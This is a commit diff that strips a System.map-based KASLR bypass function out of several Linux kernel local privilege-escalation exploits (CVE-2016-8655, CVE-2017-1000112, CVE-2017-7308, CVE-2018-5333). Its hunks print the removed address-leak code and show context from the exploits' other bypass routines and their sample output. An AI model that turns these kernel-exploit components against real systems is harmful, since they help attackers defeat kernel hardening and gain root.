Remove System.map KASLR bypass

Author: bcoles

CVE-2016-8655/chocobo_root.c

@@ -117,7 +117,6 @@ Updated by <bcoles@gmail.com>
 #  define KERNEL_BASE_MIN		0xffffffff00000000ul
 #  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
-#  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
 #  define ENABLE_KASLR_BYPASS_MINCORE	1
 #endif
@@ -808,47 +807,6 @@ unsigned long get_kernel_addr_kallsyms() {
 }
 #endif
 
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-// https://grsecurity.net/~spender/exploits/exploit.txt
-
-#if ENABLE_KASLR_BYPASS_SYSMAP
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
-#endif
-
 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
 // https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 
@@ -906,11 +864,6 @@ unsigned long get_kernel_addr() {
     if (addr) return addr;
 #endif
 
-#if ENABLE_KASLR_BYPASS_SYSMAP
-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-#endif
-
 #if ENABLE_KASLR_BYPASS_SYSLOG
     addr = get_kernel_addr_syslog();
     if (addr) return addr;

CVE-2017-1000112/poc.c

@@ -23,8 +23,6 @@
 // [~] done, namespace sandbox set up
 // [.] KASLR bypass enabled, getting kernel base address...
 // [.] trying /proc/kallsyms...
-// [.] trying /boot/System.map-4.8.0-58-generic...
-// [-] open/read(/boot/System.map-4.8.0-58-generic): Permission denied
 // [.] trying syslog...
 // [~] done, kernel base:   ffffffffa7e00000
 // [.] commit_creds:        ffffffffa7ea5d20
@@ -89,7 +87,6 @@
 #  define KERNEL_BASE_MIN		0xffffffff00000000ul
 #  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
-#  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
 #  define ENABLE_KASLR_BYPASS_PERF	1
 #  define ENABLE_KASLR_BYPASS_MINCORE	1
@@ -700,47 +697,6 @@ unsigned long get_kernel_addr_kallsyms() {
 }
 #endif
 
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-// https://grsecurity.net/~spender/exploits/exploit.txt
-
-#if ENABLE_KASLR_BYPASS_SYSMAP
-unsigned long get_kernel_addr_sysmap() {
-	FILE *f;
-	unsigned long addr = 0;
-	char path[512] = "/boot/System.map-";
-
-	struct utsname u;
-	u = get_kernel_version();
-	strcat(path, u.release);
-	dprintf("[.] trying %s...\n", path);
-	f = fopen(path, "r");
-	if (f == NULL) {
-		dprintf("[-] open/read(%s): %m\n", path);
-		return 0;
-	}
-
-	char dummy;
-	char sname[256];
-	char* name = "startup_64";
-	int ret = 0;
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-		if (ret == 0) {
-			fscanf(f, "%s\n", sname);
-			continue;
-		}
-		if (!strcmp(name, sname)) {
-			fclose(f);
-			return addr;
-		}
-	}
-
-	fclose(f);
-	dprintf("[-] kernel base not found in %s\n", path);
-	return 0;
-}
-#endif
-
 // * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
 // https://blog.lizzie.io/kaslr-and-perf.html
 
@@ -927,11 +883,6 @@ unsigned long get_kernel_addr() {
 	if (addr) return addr;
 #endif
 
-#if ENABLE_KASLR_BYPASS_SYSMAP
-	addr = get_kernel_addr_sysmap();
-	if (addr) return addr;
-#endif
-
 #if ENABLE_KASLR_BYPASS_SYSLOG
 	addr = get_kernel_addr_syslog();
 	if (addr) return addr;

CVE-2017-7308/poc.c

@@ -19,8 +19,6 @@
 // [~] done, namespace sandbox set up
 // [.] KASLR bypass enabled, getting kernel base address
 // [.] trying /proc/kallsyms...
-// [.] trying /boot/System.map-4.8.0-45-lowlatency...
-// [-] open/read(/boot/System.map-4.8.0-45-lowlatency): Permission denied
 // [.] trying syslog...
 // [.] done, kernel text:   ffffffff97400000
 // [.] commit_creds:        ffffffff974a6ec0
@@ -96,7 +94,6 @@
 #  define KERNEL_BASE_MIN		0xffffffff00000000ul
 #  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
-#  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
 #endif
 
@@ -591,47 +588,6 @@ unsigned long get_kernel_addr_kallsyms() {
 }
 #endif
 
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-// https://grsecurity.net/~spender/exploits/exploit.txt
-
-#if ENABLE_KASLR_BYPASS_SYSMAP
-unsigned long get_kernel_addr_sysmap() {
-	FILE *f;
-	unsigned long addr = 0;
-	char path[512] = "/boot/System.map-";
-
-	struct utsname u;
-	u = get_kernel_version();
-	strcat(path, u.release);
-	dprintf("[.] trying %s...\n", path);
-	f = fopen(path, "r");
-	if (f == NULL) {
-		dprintf("[-] open/read(%s): %m\n", path);
-		return 0;
-	}
-
-	char dummy;
-	char sname[256];
-	char* name = "startup_64";
-	int ret = 0;
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-		if (ret == 0) {
-			fscanf(f, "%s\n", sname);
-			continue;
-		}
-		if (!strcmp(name, sname)) {
-			fclose(f);
-			return addr;
-		}
-	}
-
-	fclose(f);
-	dprintf("[-] kernel base not found in %s\n", path);
-	return 0;
-}
-#endif
-
 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
 
 unsigned long get_kernel_addr() {
@@ -642,11 +598,6 @@ unsigned long get_kernel_addr() {
         if (addr) return addr;
 #endif
 
-#if ENABLE_KASLR_BYPASS_SYSMAP
-	addr = get_kernel_addr_sysmap();
-	if (addr) return addr;
-#endif
-
 #if ENABLE_KASLR_BYPASS_SYSLOG
 	addr = get_kernel_addr_syslog_xenial();
 	if (addr) return addr;

CVE-2018-5333/cve-2018-5333.c

@@ -36,8 +36,6 @@
 //   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 // - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
 //   - https://grsecurity.net/~spender/exploits/exploit.txt
-// - spender's /boot/System.map KASLR bypass (requires readable System.map file)
-//   - https://grsecurity.net/~spender/exploits/exploit.txt
 // - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
 //   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 // - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
@@ -65,8 +63,6 @@
 // [.] KASLR bypass enabled, getting kernel base address
 // [.] trying /proc/kallsyms...
 // [-] kernel base not found in /proc/kallsyms
-// [.] trying /boot/System.map-4.4.0-116-generic...
-// [-] open/read(/boot/System.map-4.4.0-116-generic): Permission denied
 // [.] trying syslog...
 // [-] kernel base not found in syslog
 // [.] trying perf_event_open sampling...
@@ -119,7 +115,6 @@
 #  define KERNEL_BASE_MIN               0xffffffff00000000ul
 #  define KERNEL_BASE_MAX               0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS  1
-#  define ENABLE_KASLR_BYPASS_SYSMAP    1
 #  define ENABLE_KASLR_BYPASS_SYSLOG    1
 #  define ENABLE_KASLR_BYPASS_PERF      1
 #  define ENABLE_KASLR_BYPASS_MINCORE   1
@@ -486,47 +481,6 @@ unsigned long get_kernel_addr_kallsyms() {
 }
 #endif
 
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-// https://grsecurity.net/~spender/exploits/exploit.txt
-
-#if ENABLE_KASLR_BYPASS_SYSMAP
-unsigned long get_kernel_addr_sysmap() {
-  FILE *f;
-  unsigned long addr = 0;
-  char path[512] = "/boot/System.map-";
-
-  struct utsname u;
-  u = get_kernel_version();
-  strcat(path, u.release);
-  dprintf("[.] trying %s...\n", path);
-  f = fopen(path, "r");
-  if (f == NULL) {
-    dprintf("[-] open/read(%s): %m\n", path);
-    return 0;
-  }
-
-  char dummy;
-  char sname[256];
-  char* name = "startup_64";
-  int ret = 0;
-  while (ret != EOF) {
-    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-    if (ret == 0) {
-      fscanf(f, "%s\n", sname);
-      continue;
-    }
-    if (!strcmp(name, sname)) {
-      fclose(f);
-      return addr;
-    }
-  }
-
-  fclose(f);
-  dprintf("[-] kernel base not found in %s\n", path);
-  return 0;
-}
-#endif
-
 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
 // https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 
@@ -786,11 +740,6 @@ unsigned long get_kernel_addr() {
   if (addr) return addr;
 #endif
 
-#if ENABLE_KASLR_BYPASS_SYSMAP
-  addr = get_kernel_addr_sysmap();
-  if (addr) return addr;
-#endif
-
 #if ENABLE_KASLR_BYPASS_SYSLOG
   addr = get_kernel_addr_syslog();
   if (addr) return addr;